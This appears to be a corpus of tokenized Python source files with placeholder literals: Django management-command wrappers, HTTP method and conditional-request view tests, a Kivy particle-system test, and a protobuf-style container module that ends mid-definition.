<s> from commando import management <EOL> BaseHaystackInfoCommand = management . get_command_class ( <EOL> "<STR_LIT>" , exclude_packages = ( "<STR_LIT>" , ) ) <EOL> if BaseHaystackInfoCommand is not None : <EOL> base = BaseHaystackInfoCommand ( ) <EOL> class HaystackInfoCommandOptions ( management . CommandOptions ) : <EOL> """<STR_LIT>""" <EOL> args = base . args <EOL> help = base . help <EOL> option_list = base . option_list [ <EOL> len ( management . BaseCommandOptions . option_list ) : ] <EOL> option_groups = ( <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> option_list , <EOL> ) , ) if option_list else ( ) <EOL> actions = ( "<STR_LIT>" , ) <EOL> def handle_haystack_info ( self , * args , ** options ) : <EOL> return self . call_command ( "<STR_LIT>" , * args , ** options ) <EOL> class HaystackInfoCommand ( HaystackInfoCommandOptions , management . StandardCommand ) : <EOL> """<STR_LIT>""" <EOL> option_list = management . StandardCommand . option_list <EOL> option_groups = HaystackInfoCommandOptions . option_groups + management . StandardCommand . option_groups <EOL> else : <EOL> HaystackInfoCommand = management . StandardCommand </s>
<s> from . . clearsessions import ClearSessionsCommand as Command </s>
<s> from . . sqlcustom import SQLCustomCommand as Command </s>
<s> from commando import management <EOL> BaseSQLSequenceResetCommand = management . get_command_class ( <EOL> "<STR_LIT>" , exclude_packages = ( "<STR_LIT>" , ) ) <EOL> if BaseSQLSequenceResetCommand is not None : <EOL> base = BaseSQLSequenceResetCommand ( ) <EOL> class SQLSequenceResetCommandOptions ( management . CommandOptions ) : <EOL> """<STR_LIT>""" <EOL> args = base . args <EOL> help = base . help <EOL> option_list = base . option_list [ <EOL> len ( management . BaseCommandOptions . option_list ) : ] <EOL> option_groups = ( <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> option_list , <EOL> ) , ) if option_list else ( ) <EOL> actions = ( "<STR_LIT>" , ) <EOL> def handle_sqlsequencereset ( self , * args , ** options ) : <EOL> return self . call_command ( "<STR_LIT>" , * args , ** options ) <EOL> class SQLSequenceResetCommand ( SQLSequenceResetCommandOptions , management . StandardCommand ) : <EOL> """<STR_LIT>""" <EOL> option_list = management . StandardCommand . option_list <EOL> option_groups = SQLSequenceResetCommandOptions . option_groups + management . StandardCommand . option_groups <EOL> else : <EOL> SQLSequenceResetCommand = management . StandardCommand </s>
<s> from __future__ import unicode_literals <EOL> from django . test import client <EOL> from daydreamer . core import handlers <EOL> class ClientHandler ( client . ClientHandler , handlers . base . Handler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ClientHandler , self ) . __init__ ( * args , ** kwargs ) <EOL> self . last_request = None <EOL> @ property <EOL> def last_request ( self ) : <EOL> return self . _last_request <EOL> @ last_request . setter <EOL> def last_request ( self , request ) : <EOL> self . _last_request = request <EOL> def get_response ( self , request ) : <EOL> self . last_request = request <EOL> return super ( ClientHandler , self ) . get_response ( request ) </s>
<s> from __future__ import unicode_literals <EOL> import datetime <EOL> from daydreamer . views import generic <EOL> from daydreamer . views . behaviors import http <EOL> from . import base <EOL> class RequireGETTestCase ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> view_classes = ( http . RequireGET , generic . View , ) <EOL> def test_get_allowed ( self ) : <EOL> """<STR_LIT>""" <EOL> content = self . unique ( ) <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : content } , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content ) <EOL> def test_head_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_options_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_post_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_put_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_delete_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> class RequirePOSTTestCase ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> view_classes = ( http . RequirePOST , generic . View , ) <EOL> def test_post_allowed ( self ) : <EOL> """<STR_LIT>""" <EOL> content = self . unique ( ) <EOL> self . 
assertViewBehavior ( <EOL> { "<STR_LIT>" : content } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content ) <EOL> def test_get_allowed ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> status_code = <NUM_LIT> ) <EOL> def test_head_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_options_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_put_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_delete_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> class RequireSafeTestCase ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> view_classes = ( http . RequireSafe , generic . View , ) <EOL> def test_get_allowed ( self ) : <EOL> """<STR_LIT>""" <EOL> content = self . unique ( ) <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : content } , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content ) <EOL> def test_head_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT:200> , <EOL> content = "<STR_LIT>" ) <EOL> def test_options_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_post_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_put_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_delete_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> class ConditionTestCase ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> view_classes = ( http . Condition , generic . View , ) <EOL> def test_etag ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> content = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag , "<STR_LIT>" : content } , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content , <EOL> headers_exact = { "<STR_LIT>" : self . format_etag ( etag ) } ) <EOL> def test_etag_precedence ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) <EOL> def test_etag_match_not_modified ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag , "<STR_LIT>" : self . unique ( ) } , <EOL> headers = { "<STR_LIT>" : self . format_etag ( etag ) } , <EOL> status_code = <NUM_LIT> , <EOL> content = "<STR_LIT>" , <EOL> headers_exact = { "<STR_LIT>" : self . 
format_etag ( etag ) } ) <EOL> def test_etag_match_precdence ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag } , <EOL> headers = { "<STR_LIT>" : self . format_etag ( etag ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) <EOL> def test_etag_fail ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag , "<STR_LIT>" : self . unique ( ) } , <EOL> headers = { "<STR_LIT>" : self . format_etag ( self . unique ( ) ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exact = { "<STR_LIT>" : self . format_etag ( etag ) } ) <EOL> def test_etag_fail_precedence ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag } , <EOL> headers = { "<STR_LIT>" : self . format_etag ( self . unique ( ) ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) <EOL> def test_etag_miss ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> content = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag , "<STR_LIT>" : content } , <EOL> headers = { "<STR_LIT>" : self . format_etag ( self . unique ( ) ) } , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content , <EOL> headers_exact = { "<STR_LIT>" : self . format_etag ( etag ) } ) <EOL> def test_etag_miss_precedence ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . 
unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag } , <EOL> headers = { "<STR_LIT>" : self . format_etag ( self . unique ( ) ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) <EOL> def test_last_modified ( self ) : <EOL> """<STR_LIT>""" <EOL> last_modified = datetime . datetime . now ( ) <EOL> content = self . unique ( ) <EOL> def condition_last_modified ( self , request , * args , ** kwargs ) : <EOL> return last_modified <EOL> self . assertViewBehavior ( { <EOL> "<STR_LIT>" : condition_last_modified , <EOL> "<STR_LIT>" : content } , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content , <EOL> headers_exact = { <EOL> "<STR_LIT>" : self . format_datetime ( last_modified ) } ) <EOL> def test_last_modified_precedence ( self ) : <EOL> """<STR_LIT>""" <EOL> last_modified = datetime . datetime . now ( ) <EOL> def condition_last_modified ( self , request , * args , ** kwargs ) : <EOL> return last_modified <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_last_modified } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) <EOL> def test_last_modified_match_not_modified ( self ) : <EOL> """<STR_LIT>""" <EOL> last_modified = datetime . datetime . now ( ) <EOL> def condition_last_modified ( self , request , * args , ** kwargs ) : <EOL> return last_modified <EOL> self . assertViewBehavior ( { <EOL> "<STR_LIT>" : condition_last_modified , <EOL> "<STR_LIT>" : self . unique ( ) } , <EOL> headers = { <EOL> "<STR_LIT>" : <EOL> self . format_datetime ( <EOL> last_modified + datetime . timedelta ( hours = <NUM_LIT:1> ) ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exact = { <EOL> "<STR_LIT>" : self . format_datetime ( last_modified ) } ) <EOL> def test_last_modified_match_precedence ( self ) : <EOL> """<STR_LIT>""" <EOL> last_modified = datetime . datetime . 
now ( ) <EOL> def condition_last_modified ( self , request , * args , ** kwargs ) : <EOL> return last_modified <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_last_modified } , <EOL> headers = { <EOL> "<STR_LIT>" : <EOL> self . format_datetime ( <EOL> last_modified + datetime . timedelta ( hours = <NUM_LIT:1> ) ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) <EOL> def test_last_modified_miss ( self ) : <EOL> """<STR_LIT>""" <EOL> last_modified = datetime . datetime . now ( ) <EOL> content = self . unique ( ) <EOL> def condition_last_modified ( self , request , * args , ** kwargs ) : <EOL> return last_modified + datetime . timedelta ( hours = <NUM_LIT:1> ) <EOL> self . assertViewBehavior ( { <EOL> "<STR_LIT>" : condition_last_modified , <EOL> "<STR_LIT>" : content } , <EOL> headers = { <EOL> "<STR_LIT>" : self . format_datetime ( last_modified ) } , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content , <EOL> headers_exact = { <EOL> "<STR_LIT>" : <EOL> self . format_datetime ( <EOL> last_modified + datetime . timedelta ( hours = <NUM_LIT:1> ) ) } ) <EOL> def test_last_modified_miss_precedence ( self ) : <EOL> """<STR_LIT>""" <EOL> last_modified = datetime . datetime . now ( ) <EOL> def condition_last_modified ( self , request , * args , ** kwargs ) : <EOL> return last_modified + datetime . timedelta ( hours = <NUM_LIT:1> ) <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_last_modified } , <EOL> headers = { <EOL> "<STR_LIT>" : self . format_datetime ( last_modified ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) </s>
<s> from __future__ import unicode_literals <EOL> from django . views import generic <EOL> from . base import View <EOL> __all__ = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , ) <EOL> class FormView ( generic . FormView , View ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class CreateView ( generic . CreateView , View ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UpdateView ( generic . UpdateView , View ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DeleteView ( generic . DeleteView , View ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> from kivyparticle import ParticleSystem <EOL> from kivy . graphics . opengl import GL_ONE , GL_SRC_ALPHA <EOL> import unittest <EOL> import math <EOL> class TestParticleSystem ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . s = ParticleSystem ( '<STR_LIT>' ) <EOL> def test_config ( self ) : <EOL> self . assertEquals ( ( <NUM_LIT:32> , <NUM_LIT:32> ) , self . s . texture . size ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . emitter_x ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . emitter_y ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . emitter_x_variance ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . emitter_y_variance ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . gravity_x ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . gravity_y ) <EOL> self . assertEquals ( <NUM_LIT:0> , self . s . emitter_type ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . max_num_particles ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . life_span ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . life_span_variance ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . start_size ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . start_size_variance ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . end_size ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . end_size_variance ) <EOL> self . assertEquals ( math . radians ( <NUM_LIT> ) , self . s . emit_angle ) <EOL> self . assertEquals ( math . radians ( <NUM_LIT> ) , self . s . emit_angle_variance ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . start_rotation ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . start_rotation_variance ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . end_rotation ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . end_rotation_variance ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . speed ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . speed_variance ) <EOL> self . 
assertEquals ( <NUM_LIT:0.0> , self . s . radial_acceleration ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . radial_acceleration_variance ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . tangential_acceleration ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . tangential_acceleration_variance ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . max_radius ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . max_radius_variance ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . min_radius ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . rotate_per_second ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . rotate_per_second_variance ) <EOL> self . assertEquals ( [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT> ] , self . s . start_color ) <EOL> self . assertEquals ( [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , self . s . start_color_variance ) <EOL> self . assertEquals ( [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , self . s . end_color ) <EOL> self . assertEquals ( [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , self . s . end_color_variance ) <EOL> self . assertEquals ( GL_SRC_ALPHA , self . s . blend_factor_source ) <EOL> self . assertEquals ( GL_ONE , self . s . blend_factor_dest ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import collections <EOL> import sys <EOL> if sys . version_info [ <NUM_LIT:0> ] < <NUM_LIT:3> : <EOL> class Mapping ( object ) : <EOL> __slots__ = ( ) <EOL> def get ( self , key , default = None ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> return default <EOL> def __contains__ ( self , key ) : <EOL> try : <EOL> self [ key ] <EOL> except KeyError : <EOL> return False <EOL> else : <EOL> return True <EOL> def iterkeys ( self ) : <EOL> return iter ( self ) <EOL> def itervalues ( self ) : <EOL> for key in self : <EOL> yield self [ key ] <EOL> def iteritems ( self ) : <EOL> for key in self : <EOL> yield ( key , self [ key ] ) <EOL> def keys ( self ) : <EOL> return list ( self ) <EOL> def items ( self ) : <EOL> return [ ( key , self [ key ] ) for key in self ] <EOL> def values ( self ) : <EOL> return [ self [ key ] for key in self ] <EOL> __hash__ = None <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , collections . Mapping ) : <EOL> return NotImplemented <EOL> return dict ( list ( self . items ( ) ) ) == dict ( list ( other . items ( ) ) ) <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class MutableMapping ( Mapping ) : <EOL> __slots__ = ( ) <EOL> __marker = object ( ) <EOL> def pop ( self , key , default = __marker ) : <EOL> try : <EOL> value = self [ key ] <EOL> except KeyError : <EOL> if default is self . __marker : <EOL> raise <EOL> return default <EOL> else : <EOL> del self [ key ] <EOL> return value <EOL> def popitem ( self ) : <EOL> try : <EOL> key = next ( iter ( self ) ) <EOL> except StopIteration : <EOL> raise KeyError <EOL> value = self [ key ] <EOL> del self [ key ] <EOL> return key , value <EOL> def clear ( self ) : <EOL> try : <EOL> while True : <EOL> self . 
popitem ( ) <EOL> except KeyError : <EOL> pass <EOL> def update ( * args , ** kwds ) : <EOL> if len ( args ) > <NUM_LIT:2> : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( len ( args ) ) ) <EOL> elif not args : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> self = args [ <NUM_LIT:0> ] <EOL> other = args [ <NUM_LIT:1> ] if len ( args ) >= <NUM_LIT:2> else ( ) <EOL> if isinstance ( other , Mapping ) : <EOL> for key in other : <EOL> self [ key ] = other [ key ] <EOL> elif hasattr ( other , "<STR_LIT>" ) : <EOL> for key in list ( other . keys ( ) ) : <EOL> self [ key ] = other [ key ] <EOL> else : <EOL> for key , value in other : <EOL> self [ key ] = value <EOL> for key , value in list ( kwds . items ( ) ) : <EOL> self [ key ] = value <EOL> def setdefault ( self , key , default = None ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> self [ key ] = default <EOL> return default <EOL> collections . Mapping . register ( Mapping ) <EOL> collections . MutableMapping . register ( MutableMapping ) <EOL> else : <EOL> MutableMapping = collections . MutableMapping <EOL> class BaseContainer ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , message_listener ) : <EOL> """<STR_LIT>""" <EOL> self . _message_listener = message_listener <EOL> self . _values = [ ] <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self . _values [ key ] <EOL> def __len__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . _values ) <EOL> def __ne__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return not self == other <EOL> def __hash__ ( self ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . _values ) <EOL> def sort ( self , * args , ** kwargs ) : <EOL> if '<STR_LIT>' in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = kwargs . pop ( '<STR_LIT>' ) <EOL> self . _values . 
sort ( * args , ** kwargs ) <EOL> class RepeatedScalarFieldContainer ( BaseContainer ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' ] <EOL> def __init__ ( self , message_listener , type_checker ) : <EOL> """<STR_LIT>""" <EOL> super ( RepeatedScalarFieldContainer , self ) . __init__ ( message_listener ) <EOL> self . _type_checker = type_checker <EOL> def append ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . _values . append ( self . _type_checker . CheckValue ( value ) ) <EOL> if not self . _message_listener . dirty : <EOL> self . _message_listener . Modified ( ) <EOL> def insert ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> self . _values . insert ( key , self . _type_checker . CheckValue ( value ) ) <EOL> if not self . _message_listener . dirty : <EOL> self . _message_listener . Modified ( ) <EOL> def extend ( self , elem_seq ) : <EOL> """<STR_LIT>""" <EOL> if elem_seq is None : <EOL> return <EOL> try : <EOL> elem_seq_iter = iter ( elem_seq ) <EOL> except TypeError : <EOL> if not elem_seq : <EOL> return <EOL> raise <EOL> new_values = [ self . _type_checker . CheckValue ( elem ) for elem in elem_seq_iter ] <EOL> if new_values : <EOL> self . _values . extend ( new_values ) <EOL> self . _message_listener . Modified ( ) <EOL> def MergeFrom ( self , other ) : <EOL> """<STR_LIT>""" <EOL> self . _values . extend ( other . _values ) <EOL> self . _message_listener . Modified ( ) <EOL> def remove ( self , elem ) : <EOL> """<STR_LIT>""" <EOL> self . _values . remove ( elem ) <EOL> self . _message_listener . Modified ( ) <EOL> def pop ( self , key = - <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> value = self . _values [ key ] <EOL> self . __delitem__ ( key ) <EOL> return value <EOL> def __setitem__ ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( key , slice ) : <EOL> if key . step is not None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . __setslice__ ( key . start , key . stop , value ) <EOL> else : <EOL> self . 
_values [ key ] = self . _type_checker . CheckValue ( value ) <EOL> self . _message_listener . Modified ( ) <EOL> def __getslice__ ( self , start , stop ) : <EOL> """<STR_LIT>""" <EOL> return self . _values [ start : stop ] <EOL> def __setslice__ ( self , start , stop , values ) : <EOL> """<STR_LIT>""" <EOL> new_values = [ ] <EOL> for value in values : <EOL> new_values . append ( self . _type_checker . CheckValue ( value ) ) <EOL> self . _values [ start : stop ] = new_values <EOL> self . _message_listener . Modified ( ) <EOL> def __delitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> del self . _values [ key ] <EOL> self . _message_listener . Modified ( ) <EOL> def __delslice__ ( self , start , stop ) : <EOL> """<STR_LIT>""" <EOL> del self . _values [ start : stop ] <EOL> self . _message_listener . Modified ( ) <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if self is other : <EOL> return True <EOL> if isinstance ( other , self . __class__ ) : <EOL> return other . _values == self . _values <EOL> return other == self . _values <EOL> collections . MutableSequence . register ( BaseContainer ) <EOL> class RepeatedCompositeFieldContainer ( BaseContainer ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' ] <EOL> def __init__ ( self , message_listener , message_descriptor ) : <EOL> """<STR_LIT>""" <EOL> super ( RepeatedCompositeFieldContainer , self ) . __init__ ( message_listener ) <EOL> self . _message_descriptor = message_descriptor <EOL> def add ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> new_element = self . _message_descriptor . _concrete_class ( ** kwargs ) <EOL> new_element . _SetListener ( self . _message_listener ) <EOL> self . _values . append ( new_element ) <EOL> if not self . _message_listener . dirty : <EOL> self . _message_listener . Modified ( ) <EOL> return new_element <EOL> def extend ( self , elem_seq ) : <EOL> """<STR_LIT>""" <EOL> message_class = self . _message_descriptor . _concrete_class <EOL> listener = self . 
_message_listener <EOL> values = self . _values <EOL> for message in elem_seq : <EOL> new_element = message_class ( ) <EOL> new_element . _SetListener ( listener ) <EOL> new_element . MergeFrom ( message ) <EOL> values . append ( new_element ) <EOL> listener . Modified ( ) <EOL> def MergeFrom ( self , other ) : <EOL> """<STR_LIT>""" <EOL> self . extend ( other . _values ) <EOL> def remove ( self , elem ) : <EOL> """<STR_LIT>""" <EOL> self . _values . remove ( elem ) <EOL> self . _message_listener . Modified ( ) <EOL> def pop ( self , key = - <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> value = self . _values [ key ] <EOL> self . __delitem__ ( key ) <EOL> return value <EOL> def __getslice__ ( self , start , stop ) : <EOL> """<STR_LIT>""" <EOL> return self . _values [ start : stop ] <EOL> def __delitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> del self . _values [ key ] <EOL> self . _message_listener . Modified ( ) <EOL> def __delslice__ ( self , start , stop ) : <EOL> """<STR_LIT>""" <EOL> del self . _values [ start : stop ] <EOL> self . _message_listener . Modified ( ) <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if self is other : <EOL> return True <EOL> if not isinstance ( other , self . __class__ ) : <EOL> raise TypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return self . _values == other . _values <EOL> class ScalarMap ( MutableMapping ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , message_listener , key_checker , value_checker ) : <EOL> """<STR_LIT>""" <EOL> self . _message_listener = message_listener <EOL> self . _key_checker = key_checker <EOL> self . _value_checker = value_checker <EOL> self . _values = { } <EOL> def __getitem__ ( self , key ) : <EOL> try : <EOL> return self . _values [ key ] <EOL> except KeyError : <EOL> key = self . _key_checker . CheckValue ( key ) <EOL> val = self . _value_checker . DefaultValue ( ) <EOL> self . 
_values [ key ] = val <EOL> return val <EOL> def __contains__ ( self , item ) : <EOL> return item in self . _values <EOL> def get ( self , key , default = None ) : <EOL> if key in self : <EOL> return self [ key ] <EOL> else : <EOL> return default <EOL> def __setitem__ ( self , key , value ) : <EOL> checked_key = self . _key_checker . CheckValue ( key ) <EOL> checked_value = self . _value_checker . CheckValue ( value ) <EOL> self . _values [ checked_key ] = checked_value <EOL> self . _message_listener . Modified ( ) <EOL> def __delitem__ ( self , key ) : <EOL> del self . _values [ key ] <EOL> self . _message_listener . Modified ( ) <EOL> def __len__ ( self ) : <EOL> return len ( self . _values ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _values ) <EOL> def MergeFrom ( self , other ) : <EOL> self . _values . update ( other . _values ) <EOL> self . _message_listener . Modified ( ) <EOL> def clear ( self ) : <EOL> self . _values . clear ( ) <EOL> self . _message_listener . Modified ( ) <EOL> class MessageMap ( MutableMapping ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def __init__ ( self , message_listener , message_descriptor , key_checker ) : <EOL> """<STR_LIT>""" <EOL> self . _message_listener = message_listener <EOL> self . _message_descriptor = message_descriptor <EOL> self . _key_checker = key_checker <EOL> self . _values = { } <EOL> def __getitem__ ( 